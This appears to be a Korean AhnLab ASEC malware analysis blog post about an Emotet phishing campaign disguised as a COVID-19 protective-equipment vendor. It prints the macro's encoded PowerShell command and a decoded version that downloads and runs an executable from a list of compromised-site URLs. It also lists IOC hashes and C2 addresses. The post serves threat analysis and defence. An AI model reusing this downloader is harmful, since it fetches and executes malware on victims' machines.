본문 바로가기
악성코드 정보

코로나19 보호장비 업체를 가장하여 유포 중인 Emotet 악성코드

by AhnLab ASEC 분석팀 2020. 8. 26.

ASEC 분석팀은 지난달 Emotet 악성코드가 국내에 유포 중임을 공유하였다. 금일 확인된 피싱 메일에는 코로나19와 관련된 내용을 포함하고 있어 사용자의 각별한 주의가 필요하다.

 

 

5개월만에 돌아온 Emotet 악성코드!! 국내 유포 중

ASEC 분석팀은 금일 Emotet 악성코드가 국내 유포 중인 것을 확인하였다. 뱅킹 악성코드인 Emotet 은 지난 2월을 마지막으로 유포를 중단하였으나, 5개월이 지난 현재 다시 유포를 시작한 것으로 보여

asec.ahnlab.com

 

피싱 메일의 내용을 보면 코로나19 관련한 체온계, 마스크 등 보호장비를 취급하는 업체로 소개하고 있으며, 이러한 보호장비에 대한 관심이 있을 경우 첨부한 문서를 열람하도록 유도한다. 공격자는 최근 국내 코로나19 확진자 증가로 보호장비에 대한 관심이 늘어난 것을 이용한 것으로 추정된다.

 

피싱 메일

 

메일에 첨부된 파일은 악성 매크로를 포함하고 있는 워드 파일로, 매크로 사용을 유도하고 있다. 악성 매크로는 이전 공유한 Emotet 다운로더와 동일하게 동작한다.

 

악성 매크로를 포함한 워드 파일

 

매크로 실행 시 아래와 같이 Base64로 인코딩된 powershell 명령어가 실행된다. 디코딩된 명령어에는 다운로드 URL이 여러 개 존재하며, 최종적으로 Emotet 악성코드를 다운받게 된다.

 

powersheLL -e JABNAHIAcgAzADEAbQBfAD0AKAAnAFYAeQAnACsAJwBzAGQANwBrAGsAJwApADsALgAoACcAbgAnACsAJwBlAHcALQB
pAHQAJwArACcAZQBtACcAKQAgACQAZQBOAHYAOgB0AEUAbQBwAFwAbwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0A
... <중략> ...
AewB9AH0AJABKADgAZABwAHkAbgBzAD0AKAAnAEoAZQBtAHgANwAnACsAJwB4AHUAJwApAA==

Base64로 인코딩된 powershell명령어 

 

$Mrr31m_=('Vysd7kk');
.('new-item')
$eNv:tEmp\offiCE2019 -itemtype dIREctory;
[Net.ServicePointManager]::"SecURiTYPROtOcoL" = ('tls12, tls11, tls');
$Fjqkw_l = ('C3bc3av5i');
$L7k7j7g=('Fxgw34m');
$Dl5edc6=$env:temp+(('{0}Office2019{0}') -F [chAR]92)+$Fjqkw_l+('.exe');
$Hpu2g9_=('E59ihr7');
$Lrigowf=&('new-object') net.wEbcLient;
$Xcnye2g=('http://www.luxelistreviews.com/wp-includes/AYR/*https://www.yhyhzx.com/wp-admin/pKpz/*http://mediadrive.nichost.ru/awfcatfre/9thw57489/*http://kumarpratham.com/fonts/Wtuq/*http://fxea.club/wp-includes/mPqJMPzx/*https://xiangfu.phjrt.com/0qeoy/voB355f13v2j475/*https://www.batamry.com/tmp/baeng79095371/')."SplIT"([char]42);
$Oo9e89o=('X8dxwra');
foreach($Ws0zexn in $Xcnye2g){try{$Lrigowf."doWNLoADFILe"($Ws0zexn, $Dl5edc6);
$Te1fjrf=('Xxzq993');
If ((.('Get-Item') $Dl5edc6)."LengTh" -ge 34409) {&('Invoke-Item')($Dl5edc6);
$Ncn7i2n=('Y6j6mb1');
break;
$Ssd22nc=('Liki0z0')}}catch{}}$J8dpyns=('Jemx7xu')

디코딩된 powershell 명령어

 

위 주소로 부터 다운로드 받아진 파일은 Emotet 악성코드이다. 해당 악성코드는 C2에 접속하여 공격자로부터 명령을 받아 악성 행위를 수행하며, Trickboot, Qakbot 등과 같은 뱅킹형 악성코드를 추가로 다운로드 받을 수 있다.

 

Emotet은 여전히 피싱 메일과 악성 매크로가 포함된 Word 파일을 통해 유포되고 있다. 사용자는 메일의 발신인을 확인하고, 의심스러운 파일에 포함된 매크로 실행을 지양해야 한다.

 

현재 V3 제품에서는 관련 파일에 대하여 아래와 같이 진단하고 있다.

 

[파일 진단]

  • Downloader/DOC.Emotet.S1279 (2020.08.20.07)
  • Trojan/Win32.Emotet.R349238 (2020.08.26.09)

 

[관련 IOC 정보]

 

[C2]

  • hxxp://www.luxelistreviews.com/wp-includes/AYR/
  • hxxps://www.yhyhzx.com/wp-admin/pKpz/
  • hxxp://mediadrive.nichost.ru/awfcatfre/9thw57489/
  • hxxp://kumarpratham.com/fonts/Wtuq/
  • hxxp://fxea.club/wp-includes/mPqJMPzx/
  • hxxps://xiangfu.phjrt.com/0qeoy/voB355f13v2j475/
  • hxxps://www.batamry.com/tmp/baeng79095371/

 

[HASH]

  • feaaab7f361af7eb0211cb93939ecaab
  • 74f226091203ecb670859a0cc9126b06
  • 2a15292237a524332a06f9b0ace97f6d

 

 

댓글0